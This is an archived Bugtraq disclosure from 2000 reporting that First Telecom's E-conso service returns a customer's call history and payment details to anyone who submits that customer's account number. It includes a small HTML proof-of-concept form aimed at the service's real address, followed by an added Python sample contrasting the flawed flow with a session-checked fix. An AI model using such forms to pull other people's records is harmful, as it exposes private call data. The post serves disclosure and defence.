Bugtraq Archives: First Telecom E-conso service totally insecure


Subject: First Telecom E-conso service totally insecure
From: Thomas Quinot (thomasCUIVRE.FR.EU.ORG)
Date: Mon Jan 03 2000 - 17:10:30 CST


First Telecom, a company that provides a pre-paid calling card service
in France, Germany and the United Kingdom, offers a service
called E-conso which allows subscribers to check the current balance
of their account and peruse the history of all calls they made through
First Telecom.

The WWW form at the home page of the service requires entry of
the account number (which is printed on all First Telecom documents
and embossed on the plastic membership card sent to every subscriber),
as well as a password chosen by the customer during the sign-up
procedure.

The submission of this form returns a page which includes the customer's
name and address, and a form (with a /fixed/ "action" URL) which
contains the customer's account number as a "hidden" field.
Submission of this form returns the details of payments or
the call history, depending on which button is clicked by the customer.

No hidden field and no cookie is used to pass any client credentials
back to the server, which means it is trivial to retrieve the details
of past payments as well as the call history of a First Telecom
customer knowing only her (non-secret) account number.

The HTML code included demonstrates this important flaw.

Thomas.

---------- cut here : first.html

<html>

<head>
<title>First Telecom e-conso exploit</title>
</head>

<body>
<form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton" method="POST">
 <p>
Account number: <input type="text" name="cmaster" value="0000000">
<input type="submit" name="cmdcdr" value="Details of calls">
<input type="submit" name="cmdpaymenthistory" value="Details of payements">
 </p>
</form>
</body>
</html>
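
An added example, not part of the original post and not First Telecom's code: a Python model of the two-step flow described above, showing the second step as reported (the submitted `cmaster` field alone selects the account) beside a version that takes the account from a server-side session. The account data, function names and in-memory session store are assumptions constructed for illustration.

```python
import hmac
import secrets
import time

# Constructed sample data; plaintext passwords only to keep the sample short.
ACCOUNTS = {
    "1000001": {"password": "correct horse", "calls": ["2000-01-02 0149000000 3min"]},
    "1000002": {"password": "tr0ub4dor", "calls": ["2000-01-03 0171000000 9min"]},
}
SESSIONS = {}          # token -> (account, expiry); never sent to the client
SESSION_TTL = 600      # seconds


def login(account, password):
    """Step 1: check the password and issue an unguessable session token."""
    record = ACCOUNTS.get(account)
    expected = record["password"] if record else ""
    if not hmac.compare_digest(expected.encode(), password.encode()) or not record:
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = (account, time.time() + SESSION_TTL)
    return token


def history_vulnerable(form):
    """Step 2 as described in the post: the form field alone selects the account."""
    record = ACCOUNTS.get(form.get("cmaster"))
    return record["calls"] if record else None


def history_hardened(form, token):
    """Step 2 with the account taken from the server-side session."""
    session = SESSIONS.get(token or "")
    if session is None or session[1] < time.time():
        SESSIONS.pop(token, None)
        raise PermissionError("no valid session")
    account = session[0]
    # A submitted cmaster that differs from the session's account is tampering.
    if form.get("cmaster", account) != account:
        raise PermissionError("account mismatch")
    return ACCOUNTS[account]["calls"]
```

In a real deployment the token would travel in a cookie marked Secure and HttpOnly, and the mismatch branch is worth logging as a detection signal.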



This archive was generated by hypermail 2b27 : Tue Jan 04 2000 - 13:31:20 CST